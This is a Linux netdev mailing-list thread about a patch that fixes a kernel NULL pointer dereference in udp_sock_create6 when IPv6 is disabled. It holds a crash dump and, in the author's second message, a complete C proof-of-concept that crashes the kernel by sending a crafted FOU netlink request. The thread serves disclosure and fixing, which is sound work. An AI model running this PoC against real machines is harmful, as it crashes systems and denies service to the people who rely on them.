* [PATCH net] udp_tunnel: fix NULL deref caused by udp_sock_create6 when CONFIG_IPV6=n
@ 2026-03-16 0:53 Xiang Mei
2026-03-16 0:56 ` Xiang Mei
2026-03-17 0:06 ` Jakub Kicinski
0 siblings, 2 replies; 4+ messages in thread
From: Xiang Mei @ 2026-03-16 0:53 UTC (permalink / raw)
To: netdev; +Cc: davem, edumazet, kuba, pabeni, horms, bestswngs, Xiang Mei
When CONFIG_IPV6 is disabled, the udp_sock_create6() function returns 0
(success) without actually creating a socket. Callers such as
fou_create() then proceed to dereference the uninitialized socket
pointer, resulting in a NULL pointer dereference.
Return -EPFNOSUPPORT instead, so callers correctly take their error
paths. There is only one caller of the vulnerable function and only
privileged users can trigger it.
The captured NULL deref crash:
[ 0.489638] BUG: kernel NULL pointer dereference, address: 0000000000000018
[ 0.489962] #PF: supervisor read access in kernel mode
[ 0.490193] #PF: error_code(0x0000) - not-present page
[ 0.490435] PGD 102a11067 P4D 102a11067 PUD 102a12067 PMD 0
[ 0.490706] Oops: Oops: 0000 [#1] SMP NOPTI
[ 0.490905] CPU: 0 UID: 0 PID: 140 Comm: exploit Not tainted 7.0.0-rc3+ #2 PREEMPTLAZY
[ 0.491266] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014
[ 0.491786] RIP: 0010:fou_nl_add_doit (net/ipv4/fou_core.c:590 net/ipv4/fou_core.c:764)
[ 0.492009] Code: c5 48 85 c0 0f 84 04 02 00 00 48 8b 34 24 0f b7 44 24 1c 4c 8d 44 24 30 b9 07 00 00 00 0f b7 54 24 0c 4c 89 c7 48 89 6c 24 28 <4c> 8b 6e 18 66 89 45 0a 0f b6 44 24 10 66 89 55 0e 48 89 75 00 88
All code
========
0: c5 48 85 (bad)
3: c0 0f 84 rorb $0x84,(%rdi)
6: 04 02 add $0x2,%al
8: 00 00 add %al,(%rax)
a: 48 8b 34 24 mov (%rsp),%rsi
e: 0f b7 44 24 1c movzwl 0x1c(%rsp),%eax
13: 4c 8d 44 24 30 lea 0x30(%rsp),%r8
18: b9 07 00 00 00 mov $0x7,%ecx
1d: 0f b7 54 24 0c movzwl 0xc(%rsp),%edx
22: 4c 89 c7 mov %r8,%rdi
25: 48 89 6c 24 28 mov %rbp,0x28(%rsp)
2a:* 4c 8b 6e 18 mov 0x18(%rsi),%r13 <-- trapping instruction
2e: 66 89 45 0a mov %ax,0xa(%rbp)
32: 0f b6 44 24 10 movzbl 0x10(%rsp),%eax
37: 66 89 55 0e mov %dx,0xe(%rbp)
3b: 48 89 75 00 mov %rsi,0x0(%rbp)
3f: 88 .byte 0x88
Code starting with the faulting instruction
===========================================
0: 4c 8b 6e 18 mov 0x18(%rsi),%r13
4: 66 89 45 0a mov %ax,0xa(%rbp)
8: 0f b6 44 24 10 movzbl 0x10(%rsp),%eax
d: 66 89 55 0e mov %dx,0xe(%rbp)
11: 48 89 75 00 mov %rsi,0x0(%rbp)
15: 88 .byte 0x88
[ 0.492846] RSP: 0018:ffffc900004a7a68 EFLAGS: 00010282
[ 0.493095] RAX: 0000000000003201 RBX: 0000000000000000 RCX: 0000000000000007
[ 0.493419] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffc900004a7a98
[ 0.493754] RBP: ffff888102882180 R08: ffffc900004a7a98 R09: ffff888102882180
[ 0.494084] R10: 0000000000000001 R11: 0000000000000000 R12: ffffc900004a7a90
[ 0.494399] R13: ffff8881008f7a00 R14: ffffc900004a7b20 R15: 0000000000000000
[ 0.494744] FS: 0000000021ac2380(0000) GS:ffff888196dab000(0000) knlGS:0000000000000000
[ 0.495126] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 0.495385] CR2: 0000000000000018 CR3: 0000000102a0a004 CR4: 0000000000772ef0
[ 0.495723] PKRU: 55555554
[ 0.495861] Call Trace:
[ 0.495990] <TASK>
[ 0.496101] genl_family_rcv_msg_doit.constprop.0 (net/netlink/genetlink.c:1114)
[ 0.496362] genl_rcv_msg (net/netlink/genetlink.c:1194 net/netlink/genetlink.c:1209)
[ 0.496530] ? __pfx_fou_nl_add_doit (net/ipv4/fou_core.c:755)
[ 0.496757] ? __pfx_genl_rcv_msg (net/netlink/genetlink.c:1200)
[ 0.496962] netlink_rcv_skb (net/netlink/af_netlink.c:2550)
[ 0.497153] genl_rcv (net/netlink/genetlink.c:1219)
[ 0.497299] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)
[ 0.497476] netlink_sendmsg (net/netlink/af_netlink.c:1894)
[ 0.497669] __sock_sendmsg (net/socket.c:727 (discriminator 1) net/socket.c:742 (discriminator 1))
[ 0.497856] __sys_sendto (./include/linux/file.h:62 (discriminator 1) ./include/linux/file.h:83 (discriminator 1) net/socket.c:2183 (discriminator 1))
[ 0.498033] __x64_sys_sendto (net/socket.c:2213 (discriminator 1) net/socket.c:2209 (discriminator 1) net/socket.c:2209 (discriminator 1))
[ 0.498212] do_syscall_64 (arch/x86/entry/syscall_64.c:63 (discriminator 1) arch/x86/entry/syscall_64.c:94 (discriminator 1))
[ 0.498381] entry_SYSCALL_64_after_hwframe (net/arch/x86/entry/entry_64.S:130)
[ 0.498610] RIP: 0033:0x41ce17
[ 0.498763] Code: ff ff f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 4d 62 09 00 00 41 89 ca 74 10 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 69 c3 55 48 89 e5 53 48 83 ec 38 44 89 4d d0
All code
========
0: ff (bad)
1: ff f7 push %rdi
3: d8 64 89 02 fsubs 0x2(%rcx,%rcx,4)
7: 48 c7 c0 ff ff ff ff mov $0xffffffffffffffff,%rax
e: eb b5 jmp 0xffffffffffffffc5
10: 0f 1f 00 nopl (%rax)
13: f3 0f 1e fa endbr64
17: 80 3d 4d 62 09 00 00 cmpb $0x0,0x9624d(%rip) # 0x9626b
1e: 41 89 ca mov %ecx,%r10d
21: 74 10 je 0x33
23: b8 2c 00 00 00 mov $0x2c,%eax
28: 0f 05 syscall
2a:* 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax <-- trapping instruction
30: 77 69 ja 0x9b
32: c3 ret
33: 55 push %rbp
34: 48 89 e5 mov %rsp,%rbp
37: 53 push %rbx
38: 48 83 ec 38 sub $0x38,%rsp
3c: 44 89 4d d0 mov %r9d,-0x30(%rbp)
Code starting with the faulting instruction
===========================================
0: 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax
6: 77 69 ja 0x71
8: c3 ret
9: 55 push %rbp
a: 48 89 e5 mov %rsp,%rbp
d: 53 push %rbx
e: 48 83 ec 38 sub $0x38,%rsp
12: 44 89 4d d0 mov %r9d,-0x30(%rbp)
[ 0.499591] RSP: 002b:00007ffd7730d918 EFLAGS: 00000202 ORIG_RAX: 000000000000002c
[ 0.499950] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 000000000041ce17
[ 0.500272] RDX: 000000000000002c RSI: 00000000004b3b20 RDI: 0000000000000003
[ 0.500585] RBP: 00007ffd7730d970 R08: 00007ffd7730d94c R09: 000000000000000c
[ 0.500923] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffd7730da88
[ 0.501246] R13: 00007ffd7730da98 R14: 00000000004ad868 R15: 0000000000000001
[ 0.501559] </TASK>
Fixes: fd384412e199b ("udp_tunnel: Seperate ipv6 functions into its own file.")
Reported-by: Weiming Shi <bestswngs@gmail.com>
Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
include/net/udp_tunnel.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/include/net/udp_tunnel.h b/include/net/udp_tunnel.h
index d9c6d04bb3b5..fc1fc43345b5 100644
--- a/include/net/udp_tunnel.h
+++ b/include/net/udp_tunnel.h
@@ -52,7 +52,7 @@ int udp_sock_create6(struct net *net, struct udp_port_cfg *cfg,
static inline int udp_sock_create6(struct net *net, struct udp_port_cfg *cfg,
struct socket **sockp)
{
- return 0;
+ return -EPFNOSUPPORT;
}
#endif
--
2.43.0
^ permalink raw reply related [flat|nested] 4+ messages in thread* Re: [PATCH net] udp_tunnel: fix NULL deref caused by udp_sock_create6 when CONFIG_IPV6=n 2026-03-16 0:53 [PATCH net] udp_tunnel: fix NULL deref caused by udp_sock_create6 when CONFIG_IPV6=n Xiang Mei @ 2026-03-16 0:56 ` Xiang Mei 2026-03-17 0:06 ` Jakub Kicinski 1 sibling, 0 replies; 4+ messages in thread From: Xiang Mei @ 2026-03-16 0:56 UTC (permalink / raw) To: netdev; +Cc: davem, edumazet, kuba, pabeni, horms, bestswngs On Sun, Mar 15, 2026 at 05:53:37PM -0700, Xiang Mei wrote: > When CONFIG_IPV6 is disabled, the udp_sock_create6() function returns 0 > (success) without actually creating a socket. Callers such as > fou_create() then proceed to dereference the uninitialized socket > pointer, resulting in a NULL pointer dereference. > > Return -EPFNOSUPPORT instead, so callers correctly take their error > paths. There is only one caller of the vulnerable function and only > privileged users can trigger it. > > The captured NULL deref crash: > [ 0.489638] BUG: kernel NULL pointer dereference, address: 0000000000000018 > [ 0.489962] #PF: supervisor read access in kernel mode > [ 0.490193] #PF: error_code(0x0000) - not-present page > [ 0.490435] PGD 102a11067 P4D 102a11067 PUD 102a12067 PMD 0 > [ 0.490706] Oops: Oops: 0000 [#1] SMP NOPTI > [ 0.490905] CPU: 0 UID: 0 PID: 140 Comm: exploit Not tainted 7.0.0-rc3+ #2 PREEMPTLAZY > [ 0.491266] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 > [ 0.491786] RIP: 0010:fou_nl_add_doit (net/ipv4/fou_core.c:590 net/ipv4/fou_core.c:764) > [ 0.492009] Code: c5 48 85 c0 0f 84 04 02 00 00 48 8b 34 24 0f b7 44 24 1c 4c 8d 44 24 30 b9 07 00 00 00 0f b7 54 24 0c 4c 89 c7 48 89 6c 24 28 <4c> 8b 6e 18 66 89 45 0a 0f b6 44 24 10 66 89 55 0e 48 89 75 00 88 > All code > ======== > 0: c5 48 85 (bad) > 3: c0 0f 84 rorb $0x84,(%rdi) > 6: 04 02 add $0x2,%al > 8: 00 00 add %al,(%rax) > a: 48 8b 34 24 mov (%rsp),%rsi > e: 0f b7 44 24 1c movzwl 0x1c(%rsp),%eax > 13: 4c 8d 44 24 30 lea 0x30(%rsp),%r8 > 18: b9 07 00 00 00 mov $0x7,%ecx > 1d: 0f b7 54 24 0c movzwl 0xc(%rsp),%edx > 22: 4c 89 c7 mov %r8,%rdi > 25: 48 89 6c 24 28 mov %rbp,0x28(%rsp) > 2a:* 4c 8b 6e 18 mov 0x18(%rsi),%r13 <-- trapping instruction > 2e: 66 89 45 0a mov %ax,0xa(%rbp) > 32: 0f b6 44 24 10 movzbl 0x10(%rsp),%eax > 37: 66 89 55 0e mov %dx,0xe(%rbp) > 3b: 48 89 75 00 mov %rsi,0x0(%rbp) > 3f: 88 .byte 0x88 > > Code starting with the faulting instruction > =========================================== > 0: 4c 8b 6e 18 mov 0x18(%rsi),%r13 > 4: 66 89 45 0a mov %ax,0xa(%rbp) > 8: 0f b6 44 24 10 movzbl 0x10(%rsp),%eax > d: 66 89 55 0e mov %dx,0xe(%rbp) > 11: 48 89 75 00 mov %rsi,0x0(%rbp) > 15: 88 .byte 0x88 > [ 0.492846] RSP: 0018:ffffc900004a7a68 EFLAGS: 00010282 > [ 0.493095] RAX: 0000000000003201 RBX: 0000000000000000 RCX: 0000000000000007 > [ 0.493419] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffc900004a7a98 > [ 0.493754] RBP: ffff888102882180 R08: ffffc900004a7a98 R09: ffff888102882180 > [ 0.494084] R10: 0000000000000001 R11: 0000000000000000 R12: ffffc900004a7a90 > [ 0.494399] R13: ffff8881008f7a00 R14: ffffc900004a7b20 R15: 0000000000000000 > [ 0.494744] FS: 0000000021ac2380(0000) GS:ffff888196dab000(0000) knlGS:0000000000000000 > [ 0.495126] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ 0.495385] CR2: 0000000000000018 CR3: 0000000102a0a004 CR4: 0000000000772ef0 > [ 0.495723] PKRU: 55555554 > [ 0.495861] Call Trace: > [ 0.495990] <TASK> > [ 0.496101] genl_family_rcv_msg_doit.constprop.0 (net/netlink/genetlink.c:1114) > [ 0.496362] genl_rcv_msg (net/netlink/genetlink.c:1194 net/netlink/genetlink.c:1209) > [ 0.496530] ? __pfx_fou_nl_add_doit (net/ipv4/fou_core.c:755) > [ 0.496757] ? __pfx_genl_rcv_msg (net/netlink/genetlink.c:1200) > [ 0.496962] netlink_rcv_skb (net/netlink/af_netlink.c:2550) > [ 0.497153] genl_rcv (net/netlink/genetlink.c:1219) > [ 0.497299] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344) > [ 0.497476] netlink_sendmsg (net/netlink/af_netlink.c:1894) > [ 0.497669] __sock_sendmsg (net/socket.c:727 (discriminator 1) net/socket.c:742 (discriminator 1)) > [ 0.497856] __sys_sendto (./include/linux/file.h:62 (discriminator 1) ./include/linux/file.h:83 (discriminator 1) net/socket.c:2183 (discriminator 1)) > [ 0.498033] __x64_sys_sendto (net/socket.c:2213 (discriminator 1) net/socket.c:2209 (discriminator 1) net/socket.c:2209 (discriminator 1)) > [ 0.498212] do_syscall_64 (arch/x86/entry/syscall_64.c:63 (discriminator 1) arch/x86/entry/syscall_64.c:94 (discriminator 1)) > [ 0.498381] entry_SYSCALL_64_after_hwframe (net/arch/x86/entry/entry_64.S:130) > [ 0.498610] RIP: 0033:0x41ce17 > [ 0.498763] Code: ff ff f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 4d 62 09 00 00 41 89 ca 74 10 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 69 c3 55 48 89 e5 53 48 83 ec 38 44 89 4d d0 > All code > ======== > 0: ff (bad) > 1: ff f7 push %rdi > 3: d8 64 89 02 fsubs 0x2(%rcx,%rcx,4) > 7: 48 c7 c0 ff ff ff ff mov $0xffffffffffffffff,%rax > e: eb b5 jmp 0xffffffffffffffc5 > 10: 0f 1f 00 nopl (%rax) > 13: f3 0f 1e fa endbr64 > 17: 80 3d 4d 62 09 00 00 cmpb $0x0,0x9624d(%rip) # 0x9626b > 1e: 41 89 ca mov %ecx,%r10d > 21: 74 10 je 0x33 > 23: b8 2c 00 00 00 mov $0x2c,%eax > 28: 0f 05 syscall > 2a:* 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax <-- trapping instruction > 30: 77 69 ja 0x9b > 32: c3 ret > 33: 55 push %rbp > 34: 48 89 e5 mov %rsp,%rbp > 37: 53 push %rbx > 38: 48 83 ec 38 sub $0x38,%rsp > 3c: 44 89 4d d0 mov %r9d,-0x30(%rbp) > > Code starting with the faulting instruction > =========================================== > 0: 48 3d 00 f0 ff ff cmp $0xfffffffffffff000,%rax > 6: 77 69 ja 0x71 > 8: c3 ret > 9: 55 push %rbp > a: 48 89 e5 mov %rsp,%rbp > d: 53 push %rbx > e: 48 83 ec 38 sub $0x38,%rsp > 12: 44 89 4d d0 mov %r9d,-0x30(%rbp) > [ 0.499591] RSP: 002b:00007ffd7730d918 EFLAGS: 00000202 ORIG_RAX: 000000000000002c > [ 0.499950] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 000000000041ce17 > [ 0.500272] RDX: 000000000000002c RSI: 00000000004b3b20 RDI: 0000000000000003 > [ 0.500585] RBP: 00007ffd7730d970 R08: 00007ffd7730d94c R09: 000000000000000c > [ 0.500923] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffd7730da88 > [ 0.501246] R13: 00007ffd7730da98 R14: 00000000004ad868 R15: 0000000000000001 > [ 0.501559] </TASK> > > Fixes: fd384412e199b ("udp_tunnel: Seperate ipv6 functions into its own file.") > Reported-by: Weiming Shi <bestswngs@gmail.com> > Signed-off-by: Xiang Mei <xmei5@asu.edu> > --- > include/net/udp_tunnel.h | 2 +- > 1 file changed, 1 insertion(+), 1 deletion(-) > > diff --git a/include/net/udp_tunnel.h b/include/net/udp_tunnel.h > index d9c6d04bb3b5..fc1fc43345b5 100644 > --- a/include/net/udp_tunnel.h > +++ b/include/net/udp_tunnel.h > @@ -52,7 +52,7 @@ int udp_sock_create6(struct net *net, struct udp_port_cfg *cfg, > static inline int udp_sock_create6(struct net *net, struct udp_port_cfg *cfg, > struct socket **sockp) > { > - return 0; > + return -EPFNOSUPPORT; > } > #endif > > -- > 2.43.0 > Thanks for your attention to this bug. It's a NULL-deref can only be triggered by privileged users. The following information could help you to reproduce the bug: 1) The required configs: ``` CONFIG_NET_FOU=y CONFIG_IPV6=n ``` 2) PoC source code: ```c /* * FoU NULL deref PoC — CONFIG_IPV6=n + CONFIG_NET_FOU=y * * FOU_CMD_ADD with AF_INET6 calls udp_sock_create6 stub that returns 0 * without creating a socket, causing NULL deref in fou_create(). */ #include <stdio.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/genetlink.h> #include <arpa/inet.h> #define ALIGN4(x) (((x) + 3) & ~3) enum { FOU_CMD_ADD = 1 }; enum { FOU_ATTR_PORT = 1, FOU_ATTR_AF, FOU_ATTR_IPPROTO }; static char buf[4096]; static int off; static void nla_put(int type, const void *data, int len) { struct nlattr *nla = (struct nlattr *)(buf + off); nla->nla_len = NLA_HDRLEN + len; nla->nla_type = type; memcpy(buf + off + NLA_HDRLEN, data, len); off += ALIGN4(nla->nla_len); } static int genl_resolve(int fd, const char *name) { struct { struct nlmsghdr n; struct genlmsghdr g; struct nlattr a; char name[32]; } req = { .n = { .nlmsg_type = GENL_ID_CTRL, .nlmsg_flags = NLM_F_REQUEST }, .g = { .cmd = CTRL_CMD_GETFAMILY, .version = 1 }, .a = { .nla_len = NLA_HDRLEN + strlen(name) + 1, .nla_type = CTRL_ATTR_FAMILY_NAME }, }; strcpy(req.name, name); req.n.nlmsg_len = NLMSG_LENGTH(GENL_HDRLEN) + ALIGN4(req.a.nla_len); if (send(fd, &req, req.n.nlmsg_len, 0) < 0) return -1; char resp[4096]; int n = recv(fd, resp, sizeof(resp), 0); if (n < 0 || ((struct nlmsghdr *)resp)->nlmsg_type == NLMSG_ERROR) return -1; struct nlattr *attr = (struct nlattr *)(resp + NLMSG_HDRLEN + GENL_HDRLEN); for (int rem = n - NLMSG_HDRLEN - GENL_HDRLEN; rem >= NLA_HDRLEN; ) { if (attr->nla_type == CTRL_ATTR_FAMILY_ID) { __u16 id; memcpy(&id, (char *)attr + NLA_HDRLEN, sizeof(id)); return id; } int step = ALIGN4(attr->nla_len); if (step < NLA_HDRLEN) break; rem -= step; attr = (struct nlattr *)((char *)attr + step); } return -1; } int main(void) { int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC); struct sockaddr_nl sa = { .nl_family = AF_NETLINK,}; if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("bind"); return 1; } int fam = genl_resolve(fd, "fou"); if (fam < 0) { fprintf(stderr, "[-] Can't resolve 'fou'. CONFIG_NET_FOU=y?\n"); return 1; } /* Build FOU_CMD_ADD with AF_INET6 */ off = NLMSG_HDRLEN + GENL_HDRLEN; struct genlmsghdr *genl = (struct genlmsghdr *)(buf + NLMSG_HDRLEN); genl->cmd = FOU_CMD_ADD; genl->version = 1; __u16 port = htons(0x132); __u8 af = AF_INET6, proto = 4; nla_put(FOU_ATTR_PORT, &port, 2); nla_put(FOU_ATTR_AF, &af, 1); nla_put(FOU_ATTR_IPPROTO, &proto, 1); struct nlmsghdr *nlh = (struct nlmsghdr *)buf; *nlh = (struct nlmsghdr){ .nlmsg_len = off, .nlmsg_type = fam, .nlmsg_flags = NLM_F_REQUEST }; struct sockaddr_nl dst = { .nl_family = AF_NETLINK }; if (sendto(fd, buf, off, 0, (struct sockaddr *)&dst, sizeof(dst)) < 0) { perror("sendto"); return 1; } } ``` The intended crash was attached in the commit message. Please let me know if you have any questions for the patch and poc. Thanks, Xiang ^ permalink raw reply [flat|nested] 4+ messages in thread
* Re: [PATCH net] udp_tunnel: fix NULL deref caused by udp_sock_create6 when CONFIG_IPV6=n 2026-03-16 0:53 [PATCH net] udp_tunnel: fix NULL deref caused by udp_sock_create6 when CONFIG_IPV6=n Xiang Mei 2026-03-16 0:56 ` Xiang Mei @ 2026-03-17 0:06 ` Jakub Kicinski 2026-03-17 1:04 ` Xiang Mei 1 sibling, 1 reply; 4+ messages in thread From: Jakub Kicinski @ 2026-03-17 0:06 UTC (permalink / raw) To: Xiang Mei; +Cc: netdev, davem, edumazet, pabeni, horms, bestswngs On Sun, 15 Mar 2026 17:53:37 -0700 Xiang Mei wrote: > When CONFIG_IPV6 is disabled, the udp_sock_create6() function returns 0 > (success) without actually creating a socket. Callers such as > fou_create() then proceed to dereference the uninitialized socket > pointer, resulting in a NULL pointer dereference. > > Return -EPFNOSUPPORT instead, so callers correctly take their error > paths. There is only one caller of the vulnerable function and only > privileged users can trigger it. > > The captured NULL deref crash: > [ 0.489638] BUG: kernel NULL pointer dereference, address: 0000000000000018 > [ 0.489962] #PF: supervisor read access in kernel mode > [ 0.490193] #PF: error_code(0x0000) - not-present page > [ 0.490435] PGD 102a11067 P4D 102a11067 PUD 102a12067 PMD 0 > [ 0.490706] Oops: Oops: 0000 [#1] SMP NOPTI > [ 0.490905] CPU: 0 UID: 0 PID: 140 Comm: exploit Not tainted 7.0.0-rc3+ #2 PREEMPTLAZY > [ 0.491266] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 > [ 0.491786] RIP: 0010:fou_nl_add_doit (net/ipv4/fou_core.c:590 net/ipv4/fou_core.c:764) > [ 0.492009] Code: c5 48 85 c0 0f 84 04 02 00 00 48 8b 34 24 0f b7 44 24 1c 4c 8d 44 24 30 b9 07 00 00 00 0f b7 54 24 0c 4c 89 c7 48 89 6c 24 28 <4c> 8b 6e 18 66 89 45 0a 0f b6 44 24 10 66 89 55 0e 48 89 75 00 88 > All code > ======== Please trim the crash dump to what is relevant. -- pw-bot: cr ^ permalink raw reply [flat|nested] 4+ messages in thread
* Re: [PATCH net] udp_tunnel: fix NULL deref caused by udp_sock_create6 when CONFIG_IPV6=n 2026-03-17 0:06 ` Jakub Kicinski @ 2026-03-17 1:04 ` Xiang Mei 0 siblings, 0 replies; 4+ messages in thread From: Xiang Mei @ 2026-03-17 1:04 UTC (permalink / raw) To: Jakub Kicinski; +Cc: netdev, davem, edumazet, pabeni, horms, bestswngs Thanks for the tips. V2 was sent with a better crash dump. On Mon, Mar 16, 2026 at 5:06 PM Jakub Kicinski <kuba@kernel.org> wrote: > > On Sun, 15 Mar 2026 17:53:37 -0700 Xiang Mei wrote: > > When CONFIG_IPV6 is disabled, the udp_sock_create6() function returns 0 > > (success) without actually creating a socket. Callers such as > > fou_create() then proceed to dereference the uninitialized socket > > pointer, resulting in a NULL pointer dereference. > > > > Return -EPFNOSUPPORT instead, so callers correctly take their error > > paths. There is only one caller of the vulnerable function and only > > privileged users can trigger it. > > > > The captured NULL deref crash: > > [ 0.489638] BUG: kernel NULL pointer dereference, address: 0000000000000018 > > [ 0.489962] #PF: supervisor read access in kernel mode > > [ 0.490193] #PF: error_code(0x0000) - not-present page > > [ 0.490435] PGD 102a11067 P4D 102a11067 PUD 102a12067 PMD 0 > > [ 0.490706] Oops: Oops: 0000 [#1] SMP NOPTI > > [ 0.490905] CPU: 0 UID: 0 PID: 140 Comm: exploit Not tainted 7.0.0-rc3+ #2 PREEMPTLAZY > > [ 0.491266] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 > > [ 0.491786] RIP: 0010:fou_nl_add_doit (net/ipv4/fou_core.c:590 net/ipv4/fou_core.c:764) > > [ 0.492009] Code: c5 48 85 c0 0f 84 04 02 00 00 48 8b 34 24 0f b7 44 24 1c 4c 8d 44 24 30 b9 07 00 00 00 0f b7 54 24 0c 4c 89 c7 48 89 6c 24 28 <4c> 8b 6e 18 66 89 45 0a 0f b6 44 24 10 66 89 55 0e 48 89 75 00 88 > > All code > > ======== > > Please trim the crash dump to what is relevant. > -- > pw-bot: cr ^ permalink raw reply [flat|nested] 4+ messages in thread
end of thread, other threads:[~2026-03-17 1:04 UTC | newest] Thread overview: 4+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2026-03-16 0:53 [PATCH net] udp_tunnel: fix NULL deref caused by udp_sock_create6 when CONFIG_IPV6=n Xiang Mei 2026-03-16 0:56 ` Xiang Mei 2026-03-17 0:06 ` Jakub Kicinski 2026-03-17 1:04 ` Xiang Mei
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox